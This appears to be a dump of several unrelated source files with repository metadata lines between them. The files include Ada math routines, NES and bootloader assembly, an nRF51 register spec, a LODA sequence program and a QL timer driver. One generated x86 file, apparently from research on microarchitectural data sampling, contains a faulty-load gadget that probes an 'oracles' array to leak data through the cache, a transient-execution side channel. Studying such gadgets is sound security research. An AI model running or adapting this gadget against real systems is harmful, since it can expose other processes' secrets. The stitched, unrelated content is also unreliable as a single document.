-2**63 .. 2**63 - 1; -- used for conversions HM : constant Positive := LF'Machine_Mantissa / 2; C1 : constant LF := LF'Leading_Part (Half_Pi, HM); C2 : constant LF := LF'Leading_Part (Half_Pi - C1, HM); C3 : constant LF := LF'Leading_Part (Half_Pi - C1 - C2, HM); C4 : constant LF := Half_Pi - C1 - C2 - C3; K : LF := N; K_Hi : LF; K_Lo : LF; begin Q := 0; loop Split_Veltkamp (X => K, X_Hi => K_Hi, X_Lo => K_Lo); X := Multiply_Add (-K_Hi, C1, X); X := Multiply_Add (-K_Hi, C2, Multiply_Add (-K_Lo, C1, X)); X := Multiply_Add (-K_Hi, C3, Multiply_Add (-K_Lo, C2, X)); X := Multiply_Add (-K_Hi, C4, Multiply_Add (-K_Lo, C3, X)); X := Multiply_Add (-K_Lo, C4, X); if abs K < 2.0**62 or else abs K_Lo <= 2.0**62 then Q := Quadrant ((Int_64 (Q) + Int_64 (N)) mod 4); end if; exit when X in -0.26 * Pi .. 0.26 * Pi; K := LF'Machine_Rounding (X * Half_Pi**(-1)); end loop; end Reduce_Half_Pi_Large; ---------- -- Acos -- ---------- function Acos (X : LF) return LF is (Instantiations.Acos (X)); ----------- -- Acosh -- ----------- function Acosh (X : LF) return LF is -- Math based implementation using Log1p: x-> Log (1+x) T : constant LF := X - 1.0; begin if X > 1.0 / Sqrt_Epsilon_LF then return Log (X) + Ln_2; elsif X < 2.0 then return Log1p (T + Sqrt (2.0 * T + T * T)); else return Log (X + Sqrt ((X - 1.0) * (X + 1.0))); end if; end Acosh; ---------- -- Asin -- ---------- function Asin (X : LF) return LF is (Long_Float_Approximations.Asin (X)); ----------- -- Asinh -- ----------- function Asinh (X : LF) return LF is -- Math based implementation using Log1p: x-> Log (1+x) Y : constant LF := abs X; G : constant LF := X * X; Res : LF; begin if Y < Sqrt_Epsilon_LF then Res := Y; elsif Y > 1.0 / Sqrt_Epsilon_LF then Res := Log (Y) + Ln_2; elsif Y < 2.0 then Res := Log1p (Y + G / (1.0 + Sqrt (G + 1.0))); else Res := Log (Y + Sqrt (G + 1.0)); end if; return LF'Copy_Sign (Res, X); end Asinh; ---------- -- Atan -- ---------- function Atan (X : LF) return LF is (Instantiations.Atan2 (X, 1.0)); ----------- -- Atan2 -- ----------- function Atan2 (Y, X : LF) return LF is (Instantiations.Atan2 (Y, X)); ----------- -- Atanh -- ----------- function Atanh (X : LF) return LF is -- Math based implementation using Log1p: x-> Log (1+x) (if X >= 0.0 then Log1p (2.0 * X / (1.0 - X)) / 2.0 else -Log1p (-2.0 * X / (1.0 + X)) / 2.0); --------- -- Cos -- --------- function Cos (X : LF) return LF is -- Math based implementation using Hart constants Y : LF := abs (X); Q : Quadrant; Result : LF; begin Reduce_Half_Pi (Y, Q); if Q mod 2 = 0 then Result := Approx_Cos (Y); else Result := Approx_Sin (Y); end if; return (if Q = 1 or else Q = 2 then -Result else Result); end Cos; ---------- -- Cosh -- ---------- function Cosh (X : LF) return LF is -- Cody and Waite implementation (page 217) Y : constant LF := abs (X); -- Because the overflow threshold for cosh(X) is beyond the overflow -- threshold for exp(X), it appears natural to reformulate the -- computation as: -- Cosh (X) = Exp (X - Log (2)) -- But because Log (2) is not an exact machine number, the finite word -- length of the machine implies that the absolute error in X - Log (2), -- hence the transmitted error in Cosh (X) is proportional to the -- magnitude of X even when X is error-free. -- To avoid this problem, we revise the computation to -- Cosh (X) = V/2 * exp(X - Log (V)) -- where Log (V) is an exact machine number slightly larger than Log (2) -- with the last few digits of its significand zero. Ln_V : constant := 8#0.542714#; -- Machine value slightly above Ln_2 V_2 : constant := 0.24999_30850_04514_99336; -- V**(-2) V_2_1 : constant := 0.13830_27787_96019_02638E-4; -- V / 2 - 1 Y_Bar : constant Long_Float := 709.78271_28933_83973_096; -- Y_Bar is the last floating point for which exp (Y) does not overflow -- and exp (-Y) does not underflow W : LF; Z : LF; begin if Y >= Y_Bar then W := Y - Ln_V; Z := Exp (W); Z := Z + V_2 / Z; return Z + V_2_1 * Z; -- rewriting of V/2 * Z else Z := Exp (Y); return (Z + 1.0 / Z) / 2.0; end if; end Cosh; --------- -- Exp -- --------- function Exp (X : LF) return LF is -- Cody and Waite implementation (page 60) N : Integer; Y : LF := X; R : LF; Ymax : constant LF := LF'Pred (709.78271_28337_79350_29149_8); -- The largest machine number less than Log (LF'Last) begin if abs (Y) < 2.0**(-LF'Machine_Mantissa - 1) then return 1.0; end if; if abs Y > Ymax then return (if Y > 0.0 then Infinity else 0.0); end if; Reduce_Ln_2 (Y, N); R := Approx_Exp (Y); return Long_Float'Scaling (R, N); end Exp; ---------- -- Exp2 -- ---------- function Exp2 (X : LF) return LF is -- Implementation based on Cody and Waite Exp implementation (page 217) -- but using Hart constants N : Integer; Y : LF := X; R : LF; Result : LF; begin if abs Y < 2.0**(-LF'Machine_Mantissa - 1) then return 1.0; end if; if abs Y > LF'Pred (LF (LF'Machine_Emax)) then return (if Y > 0.0 then Infinity else 0.0); end if; -- If X > Log(LF'Emax) ??? N := Integer (X); Y := Y - Long_Float (N); R := Approx_Exp2 (Y); Result := Long_Float'Scaling (R, N + 1); if Result /= Result then Result := (if X < LF'First then 0.0 else Infinity); end if; return Result; end Exp2; --------- -- Log -- --------- function Log (X : LF) return LF is -- Cody and Waite implementation (page 35) Exponent_X : constant Integer := LF'Exponent (X); XN : LF := LF (Exponent_X); Mantissa_X : LF := LF'Scaling (X, -Exponent_X); HM : constant Integer := LF'Machine_Mantissa / 2; L1 : constant LF := LF'Leading_Part (Ln_2, HM); L2 : constant LF := Ln_2 - L1; Result : LF; begin if X <= 0.0 then if X < 0.0 then return NaN; else return -Infinity; end if; -- Making sure X is in Sqrt (0.5) .. Sqrt (2) elsif X > Long_Float'Last then return X; elsif Mantissa_X <= Sqrt_Half then XN := XN - 1.0; Mantissa_X := Mantissa_X * 2.0; end if; Result := Approx_Log (Mantissa_X); Result := (XN * L2 + Result) + XN * L1; return Result; end Log; ----------- -- Log1p -- ----------- function Log1p (X : LF) return LF is -- Quick implementation of Log1p not accurate to the Ada regular Log -- requirements, but accurate enough to compute inverse hyperbolic -- functions. begin if 1.0 + X = 1.0 then return X; elsif X > LF'Last then return X; else return Log (1.0 + X) * (X / ((1.0 + X) - 1.0)); end if; end Log1p; ---------- -- Log2 -- ---------- function Log2 (X : LF) return LF is -- Quick implementation of Log2 not accurate to the Ada regular Log -- (base e) requirement on the whole definition interval but accurate -- enough on 0 .. 2**(-1/16). (Log (X) * (1.0 / Ln_2)); --------- -- Pow -- --------- function Pow (Left, Right : LF) return LF is -- Cody and Waite implementation (page 84) -- The implementation seems restricted to positive base, so we use -- the absolute value and remember the even/oddness of the exponent. One_Over_Sixteen : constant := 0.0625; Abs_Left : constant LF := abs (Left); M : constant Integer := LF'Exponent (Abs_Left); G : constant LF := LF'Fraction (Abs_Left); Y : constant LF := Right; Z : LF; P : Integer; U2, U1, Y1, Y2, W1, W2, W : LF; MM, PP, IW1, I : Integer; Is_Special : Boolean; Negate : Boolean; Special_Result : LF; procedure Pow_Special_Cases is new Generic_Pow_Special_Cases (LF); begin -- Special values Pow_Special_Cases (Left, Right, Is_Special, Negate, Special_Result); if Is_Special then return Special_Result; else -- Left**Right is calculated using the formula -- 2**(Right * Log2 (Left)) Reduce_044 (G, Z, P); -- At this point, Z <= 0.044 U2 := Approx_Power_Log (Z); U1 := LF (M * 16 - P) * 0.0625; -- U2 + U1 = Log2 (Left) -- Forming the pseudo extended precision product of U * Right Y1 := Reduce_1_16 (Y); Y2 := Y - Y1; W := U2 * Y + U1 * Y2; W1 := Reduce_1_16 (W); W2 := W - W1; W := W1 + U1 * Y1; W1 := Reduce_1_16 (W); W2 := W2 + (W - W1); W := Reduce_1_16 (W2); IW1 := Integer (16.0 * (W1 + W)); W2 := W2 - W; if W2 > 0.0 then W2 := W2 - One_Over_Sixteen; IW1 := 1 + IW1; end if; if IW1 < 0 then I := 0; else I := 1; end if; MM := Integer (IW1 / 16) + I; PP := 16 * MM - IW1; Z := Approx_Exp2 (W2); Special_Result := Reconstruct_Pow (Z, PP, MM); if Negate then return -Special_Result; else return Special_Result; end if; end if; end Pow; --------- -- Sin -- --------- function Sin (X : LF) return LF is -- Math based implementation using Hart constants Y : LF := abs X; Q : Quadrant; Result : LF; begin Reduce_Half_Pi (Y, Q); if Q mod 2 = 0 then Result := Approx_Sin (Y); else Result := Approx_Cos (Y); end if; return LF'Copy_Sign (1.0, X) * (if Q >= 2 then -Result else Result); end Sin; ---------- -- Sinh -- ---------- function Sinh (X : LF) return LF is -- Cody and Waite implementation (page 217) Sign : constant LF := LF'Copy_Sign (1.0, X); Y : constant LF := abs X; -- Because the overflow threshold for sinh(X) is beyond the overflow -- threshold for exp(X), it appears natural to reformulate the -- computation as: -- Sinh (X) = Exp (X - Log (2)) -- But because Log (2) is not an exact machine number, the finite word -- length of the machine implies that the absolute error in X - Log (2), -- hence the transmitted error in Sinh (X) is proportional to the -- magnitude of X even when X is error-free. To avoid this problem, we -- revise the computation to: -- Sinh (X) = V/2 * exp(X - Log (V)) -- where Log (V) is an exact machine number slightly larger than Log (2) -- with the last few digits of its significand zero. Ln_V : constant := 8#0.542714#; -- Machine value slightly above Ln_2 V_2 : constant := 0.24999_30850_04514_99336; -- V**(-2) V_2_1 : constant := 0.13830_27787_96019_02638E-4; -- V / 2 - 1 Y_Bar : constant Long_Float := 709.78271_28933_83973_096; -- The last floating point for which exp (X) does not overflow and -- exp (-x) does not underflow W : LF; Z : LF; begin if Y <= 1.0 then return Approx_Sinh (X); end if; if Y >= Y_Bar then W := Y - Ln_V; Z := Exp (W); Z := Z - V_2 / Z; return Sign * (Z + V_2_1 * Z); -- rewriting of V/2 * Z else Z := Exp (Y); return Sign * ((Z - 1.0 / Z) / 2.0); end if; end Sinh; ---------- -- Sqrt -- ---------- function Sqrt (X : Long_Float) return Long_Float renames System.Libm_Double.Squareroot.Sqrt; --------- -- Tan -- --------- function Tan (X : LF) return LF is -- Math based implementation using Hart constants Y : LF := abs X; N : Integer; begin if abs X < LF'Last then Reduce_Half_Pi (Y, N); else return Infinity / Infinity; end if; -- The reconstruction is included in the algebraic fraction in -- Approx_Tan function. if N mod 2 = 0 then return Approx_Tan (Y) * LF'Copy_Sign (1.0, X); else return Approx_Cot (Y) * LF'Copy_Sign (1.0, X); end if; end Tan; ---------- -- Tanh -- ---------- function Tanh (X : LF) return LF is -- Cody and Waite implementation (page 239) F : constant LF := abs (X); Xbig : constant := Ln_2 * LF (1 + LF'Machine_Mantissa); LN_3_2 : constant := 0.54930_61443_34054_84570; Result : LF; begin if F > Xbig then Result := 1.0; else if F > LN_3_2 then Result := 1.0 - 2.0 / (Exp (2.0 * F) + 1.0); else Result := Approx_Tanh (F); end if; end if; return LF'Copy_Sign (Result, X); end Tanh; end System.Libm_Double;
src/vectors.asm
munshkr/nes-snake
0
15682
<gh_stars>0 ;;;;;;;;;;;;;;;;;;; ;;; VECTORS ;;; ;;;;;;;;;;;;;;;;;;; .pad $fffa .dw nmi .dw reset .dw 0
Transynther/x86/_processed/AVXALIGN/_zr_/i9-9900K_12_0xa0.log_21829_1075.asm
ljhsiun2/medusa
9
15641
<filename>Transynther/x86/_processed/AVXALIGN/_zr_/i9-9900K_12_0xa0.log_21829_1075.asm .global s_prepare_buffers s_prepare_buffers: push %r13 push %r14 push %rbp push %rcx push %rdi push %rdx push %rsi lea addresses_UC_ht+0x15338, %rsi lea addresses_WC_ht+0x18d78, %rdi clflush (%rdi) nop nop nop nop nop add %rdx, %rdx mov $27, %rcx rep movsb nop nop sub $22038, %r13 lea addresses_A_ht+0x94f8, %rbp nop nop nop nop add %r14, %r14 mov $0x6162636465666768, %rsi movq %rsi, %xmm6 movups %xmm6, (%rbp) nop nop nop nop nop dec %rdx lea addresses_normal_ht+0xb9e8, %rdi nop nop nop nop nop cmp %rcx, %rcx mov (%rdi), %dx nop nop nop nop xor $4657, %rsi lea addresses_UC_ht+0x3d48, %rsi lea addresses_UC_ht+0xcd43, %rdi nop nop nop nop nop xor %rbp, %rbp mov $107, %rcx rep movsb nop nop nop add $12203, %rdi lea addresses_WC_ht+0x18738, %rbp nop nop nop nop add $46647, %rdx mov (%rbp), %ecx nop nop nop nop nop xor %rsi, %rsi lea addresses_WT_ht+0x126b8, %r14 nop nop xor %rsi, %rsi mov $0x6162636465666768, %rdx movq %rdx, %xmm2 movups %xmm2, (%r14) nop nop nop sub $57306, %r14 lea addresses_A_ht+0x10faa, %rsi lea addresses_normal_ht+0x12438, %rdi nop nop nop nop sub $38006, %r13 mov $120, %rcx rep movsw nop nop nop cmp $16165, %rdi lea addresses_UC_ht+0x1d18e, %r14 nop nop nop nop nop sub $56040, %r13 movl $0x61626364, (%r14) and $33195, %r13 lea addresses_D_ht+0x90f8, %r13 nop nop nop nop nop sub $45093, %rcx movb (%r13), %r14b and %rcx, %rcx lea addresses_A_ht+0x4338, %rcx sub %rbp, %rbp movups (%rcx), %xmm7 vpextrq $0, %xmm7, %rdi nop and %r14, %r14 lea addresses_WT_ht+0x7ca8, %rdx nop nop nop xor %rdi, %rdi movups (%rdx), %xmm5 vpextrq $0, %xmm5, %r14 nop nop nop nop nop cmp %r14, %r14 lea addresses_WT_ht+0x14138, %rsi nop nop nop nop sub $7046, %rcx mov $0x6162636465666768, %rbp movq %rbp, %xmm2 movups %xmm2, (%rsi) nop nop nop inc %rcx pop %rsi pop %rdx pop %rdi pop %rcx pop %rbp pop %r14 pop %r13 ret .global s_faulty_load s_faulty_load: push %r11 push %r12 push %r14 push %r15 push %r9 push %rbp push %rbx // Store lea addresses_RW+0x7938, %r11 nop nop cmp $10318, %r9 mov $0x5152535455565758, %rbx movq %rbx, (%r11) nop nop dec %r15 // Store lea addresses_D+0x1e078, %r11 nop nop nop dec %r12 movw $0x5152, (%r11) nop nop nop xor $31792, %r12 // Faulty Load lea addresses_US+0x1d338, %r14 nop nop nop nop nop xor %r11, %r11 movb (%r14), %r9b lea oracles, %rbx and $0xff, %r9 shlq $12, %r9 mov (%rbx,%r9,1), %r9 pop %rbx pop %rbp pop %r9 pop %r15 pop %r14 pop %r12 pop %r11 ret /* <gen_faulty_load> [REF] {'src': {'NT': False, 'same': False, 'congruent': 0, 'type': 'addresses_US', 'AVXalign': False, 'size': 16}, 'OP': 'LOAD'} {'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 9, 'type': 'addresses_RW', 'AVXalign': False, 'size': 8}} {'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 5, 'type': 'addresses_D', 'AVXalign': False, 'size': 2}} [Faulty Load] {'src': {'NT': False, 'same': True, 'congruent': 0, 'type': 'addresses_US', 'AVXalign': True, 'size': 1}, 'OP': 'LOAD'} <gen_prepare_buffer> {'src': {'same': False, 'congruent': 10, 'type': 'addresses_UC_ht'}, 'OP': 'REPM', 'dst': {'same': False, 'congruent': 5, 'type': 'addresses_WC_ht'}} {'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 5, 'type': 'addresses_A_ht', 'AVXalign': False, 'size': 16}} {'src': {'NT': False, 'same': False, 'congruent': 3, 'type': 'addresses_normal_ht', 'AVXalign': False, 'size': 2}, 'OP': 'LOAD'} {'src': {'same': True, 'congruent': 4, 'type': 'addresses_UC_ht'}, 'OP': 'REPM', 'dst': {'same': False, 'congruent': 0, 'type': 'addresses_UC_ht'}} {'src': {'NT': False, 'same': False, 'congruent': 10, 'type': 'addresses_WC_ht', 'AVXalign': False, 'size': 4}, 'OP': 'LOAD'} {'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 7, 'type': 'addresses_WT_ht', 'AVXalign': False, 'size': 16}} {'src': {'same': False, 'congruent': 0, 'type': 'addresses_A_ht'}, 'OP': 'REPM', 'dst': {'same': False, 'congruent': 6, 'type': 'addresses_normal_ht'}} {'OP': 'STOR', 'dst': {'NT': False, 'same': False, 'congruent': 1, 'type': 'addresses_UC_ht', 'AVXalign': False, 'size': 4}} {'src': {'NT': False, 'same': False, 'congruent': 6, 'type': 'addresses_D_ht', 'AVXalign': False, 'size': 1}, 'OP': 'LOAD'} {'src': {'NT': False, 'same': False, 'congruent': 11, 'type': 'addresses_A_ht', 'AVXalign': False, 'size': 16}, 'OP': 'LOAD'} {'src': {'NT': False, 'same': False, 'congruent': 4, 'type': 'addresses_WT_ht', 'AVXalign': False, 'size': 16}, 'OP': 'LOAD'} {'OP': 'STOR', 'dst': {'NT': False, 'same': True, 'congruent': 8, 'type': 'addresses_WT_ht', 'AVXalign': False, 'size': 16}} {'00': 21829} 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 */
4/1/AVS2/Homework/ipr2/ipr2.asm
xdegtyarev/bsuir
2
166502
[org 0x7C00] ; BIOS boot origin [bits 16] ; 16-bit Real Mode jmp start ;Jump to start() entry-point start: xor ebx,ebx mov bx,cs ; EBX=segment shl ebx,4 ; << 4 lea eax,[ebx] ; EAX=linear address of segment base ; fix up TSS entries, too lea eax,[ebx + stss] ; EAX=linear address of stss mov [gdt32_st + 2],ax shr eax,16 mov [gdt32_st + 4],al mov [gdt32_st + 7],ah lea eax,[ebx + utss] ; EAX=linear address of utss mov [gdt32_ut + 2],ax shr eax,16 mov [gdt32_ut + 4],al mov [gdt32_ut + 7],ah cli lgdt [gdt32_descriptor] ; Load GDT mov eax, cr0 or eax, 0x1 mov cr0, eax jmp dword CODE_SEG_32:pmain [bits 32] %include "gdt32.asm" %include "routines32.asm" pmain: mov ax, DATA_SEG_32 mov ds, ax mov ss, ax mov es, ax mov fs, ax mov gs, ax ;;loading task0 TSS mov ax, STASK_SEG_32; ltr ax xor eax, eax xor ecx, ecx task0: mov eax, ecx mov ebx, t0msg call print32 add ecx, 0x0002; moving next line lea eax,[task1] ; task entry point mov [utss_eip],eax mov [utss_esp],esp jmp UTASK_SEG_32:0 call delay; cmp ecx, 0x0080 jb task0 jmp $ task1: mov eax, ecx add ecx, 0x0002; task1loop: add eax, 0x00A0 mov ebx, t1msg call print32 call delay cmp eax, 0x0780 jb task1loop lea eax,[task1] ; task entry point jmp STASK_SEG_32:0 jmp $ delay: pusha mov ecx,02000000h ; delay loop $ popa ret ;;;;;;;;;;;;;; t0msg db "0", 0x0 t1msg db "1", 0x0 ;;;;;;;;;;;;;; times 510 - ($-$$) db 0 ;Fill the rest of the bootloader with zeros dw 0xAA55 ;Boot signature
arch/ARM/Nordic/svd/nrf51/nrf_svd.ads
rocher/Ada_Drivers_Library
192
5535
<reponame>rocher/Ada_Drivers_Library -- Copyright (c) 2013, Nordic Semiconductor ASA -- All rights reserved. -- -- Redistribution and use in source and binary forms, with or without -- modification, are permitted provided that the following conditions are met: -- -- * Redistributions of source code must retain the above copyright notice, this -- list of conditions and the following disclaimer. -- -- * Redistributions in binary form must reproduce the above copyright notice, -- this list of conditions and the following disclaimer in the documentation -- and/or other materials provided with the distribution. -- -- * Neither the name of Nordic Semiconductor ASA nor the names of its -- contributors may be used to endorse or promote products derived from -- this software without specific prior written permission. -- -- THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" -- AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE -- IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -- DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE -- FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL -- DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -- SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER -- CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, -- OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE -- OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -- -- This spec has been automatically generated from nrf51.svd pragma Restrictions (No_Elaboration_Code); pragma Ada_2012; pragma Style_Checks (Off); with System; -- nRF51 reference description for radio MCU with ARM 32-bit Cortex-M0 -- Microcontroller at 16MHz CPU clock package NRF_SVD is pragma Preelaborate; -------------------- -- Base addresses -- -------------------- POWER_Base : constant System.Address := System'To_Address (16#40000000#); CLOCK_Base : constant System.Address := System'To_Address (16#40000000#); MPU_Base : constant System.Address := System'To_Address (16#40000000#); AMLI_Base : constant System.Address := System'To_Address (16#40000000#); RADIO_Base : constant System.Address := System'To_Address (16#40001000#); UART0_Base : constant System.Address := System'To_Address (16#40002000#); SPI0_Base : constant System.Address := System'To_Address (16#40003000#); TWI0_Base : constant System.Address := System'To_Address (16#40003000#); SPI1_Base : constant System.Address := System'To_Address (16#40004000#); TWI1_Base : constant System.Address := System'To_Address (16#40004000#); SPIS1_Base : constant System.Address := System'To_Address (16#40004000#); SPIM1_Base : constant System.Address := System'To_Address (16#40004000#); GPIOTE_Base : constant System.Address := System'To_Address (16#40006000#); ADC_Base : constant System.Address := System'To_Address (16#40007000#); TIMER0_Base : constant System.Address := System'To_Address (16#40008000#); TIMER1_Base : constant System.Address := System'To_Address (16#40009000#); TIMER2_Base : constant System.Address := System'To_Address (16#4000A000#); RTC0_Base : constant System.Address := System'To_Address (16#4000B000#); TEMP_Base : constant System.Address := System'To_Address (16#4000C000#); RNG_Base : constant System.Address := System'To_Address (16#4000D000#); ECB_Base : constant System.Address := System'To_Address (16#4000E000#); AAR_Base : constant System.Address := System'To_Address (16#4000F000#); CCM_Base : constant System.Address := System'To_Address (16#4000F000#); WDT_Base : constant System.Address := System'To_Address (16#40010000#); RTC1_Base : constant System.Address := System'To_Address (16#40011000#); QDEC_Base : constant System.Address := System'To_Address (16#40012000#); LPCOMP_Base : constant System.Address := System'To_Address (16#40013000#); SWI_Base : constant System.Address := System'To_Address (16#40014000#); NVMC_Base : constant System.Address := System'To_Address (16#4001E000#); PPI_Base : constant System.Address := System'To_Address (16#4001F000#); FICR_Base : constant System.Address := System'To_Address (16#10000000#); UICR_Base : constant System.Address := System'To_Address (16#10001000#); GPIO_Base : constant System.Address := System'To_Address (16#50000000#); end NRF_SVD;
Task/Subtractive-generator/Ada/subtractive-generator-3.ada
LaudateCorpus1/RosettaCodeData
1
4656
with Ada.Text_IO; with Subtractive_Generator; procedure Main is Random : Subtractive_Generator.State; N : Natural; begin Subtractive_Generator.Initialize (Generator => Random, Seed => 292929); for I in 220 .. 222 loop Subtractive_Generator.Next (Generator => Random, N => N); Ada.Text_IO.Put_Line (Integer'Image (I) & ":" & Integer'Image (N)); end loop; end Main;
oeis/114/A114448.asm
neoneye/loda-programs
11
92987
; A114448: Array a(n,k) = n^k (mod k) read by antidiagonals (k>=1, n>=1). ; Submitted by <NAME>(s3) ; 0,0,1,0,0,1,0,1,2,1,0,0,0,0,1,0,1,1,1,2,1,0,0,2,0,3,4,1,0,1,0,1,4,3,2,1,0,0,1,0,0,4,3,0,1,0,1,2,1,1,1,4,1,8,1,0,0,0,0,2,0,5,0,0,4,1,0,1,1,1,3,1,6,1,1,9,2,1,0,0,2,0,4,4,0,0,8,6,3,4,1,0,1,0,1,0,3,1,1,0 lpb $0 add $1,1 sub $0,$1 lpe add $0,1 add $1,2 pow $1,$0 mod $1,$0 mov $0,$1
uti/timer.asm
olifink/smsqe
0
243025
* uti_timer_asm include dev8_keys_qdos_sms include dev8_keys_err include dev8_keys_atari include dev8_mac_xref section utility xdef ut_etime xdef ut_dtime ;+++ ; timer b ; ; Entry Exit ; D0.l error code ; D1.b timer mode preserved ; D2.b timer b data preserved ; A0.l address of int. routine preserved ; ; Error returns: err.ipar address=0 / mode =0 / data =0 ;--- timereg reg d3/d7/a0-a1 ut_etime movem.l timereg,-(sp) movem.l d1-d2,-(sp) lea time_thg,a1 xjsr ut_thuse movem.l (sp)+,d1-d2 tst.l d0 bne.s timer_rts ; error from timer thing tst.b d1 beq.s timer_err ; mode 0 tst.b d2 beq.s timer_err ; data 0 cmp.l #0,a0 beq.s timer_err ; address 0 ; lea timer,a1 move.w sr,d7 trap #0 move.l a0,$1a0 ; interrupt routine move.b #0,mfp_ctlb ; timer B control (stop timer) move.b d2,mfp_datb ; timer B data move.b d1,mfp_ctlb ; timer B control (insert mode) moveq #0,d0 ; no error bset #mfp..tbi,mfp_imra ; set timer b interrupt mask bset #mfp..tbi,mfp_tbe ; interrupt enable timer b move.w d7,sr bra.s timer_rts timer_err moveq #err.ipar,d0 timer_rts movem.l (sp)+,timereg tst.l d0 ; error ? rts ;+++ ; timer b disable ;--- ut_dtime move.l a1,-(sp) bclr #mfp..tbi,mfp_imra ; clear timer b interrupt mask bclr #mfp..tbi,mfp_tbe ; clear interrupt enable timer b bclr #mfp..tbi,mfp_tbpi ; clear mfp pending interrupt b bclr #mfp..tbi,mfp_isra ; clear in service bit lea time_thg,a1 ; thing name xjsr ut_thfre ; free it move.l (sp)+,a1 rts ;+++ ; an example of a timer b interrupt routine ;--- timer move.w d1,-(sp) move.b mfp_ctlb,d1 ; timer B control (read mode) move.b #0,mfp_ctlb ; timer B control (stop timer) addq.l #1,$2817c ; sys_top -4 move.b d1,mfp_ctlb ; timer B control (insert mode) bclr #mfp..tbi,mfp_tbpi ; clear mfp pending interrupt b bclr #mfp..tbi,mfp_isra ; clear in service bit move.w (sp)+,d1 rte time_thg dc.w 5,'Timer ' end
data/mapObjects/SSAnne3F.asm
AmateurPanda92/pokemon-rby-dx
9
23174
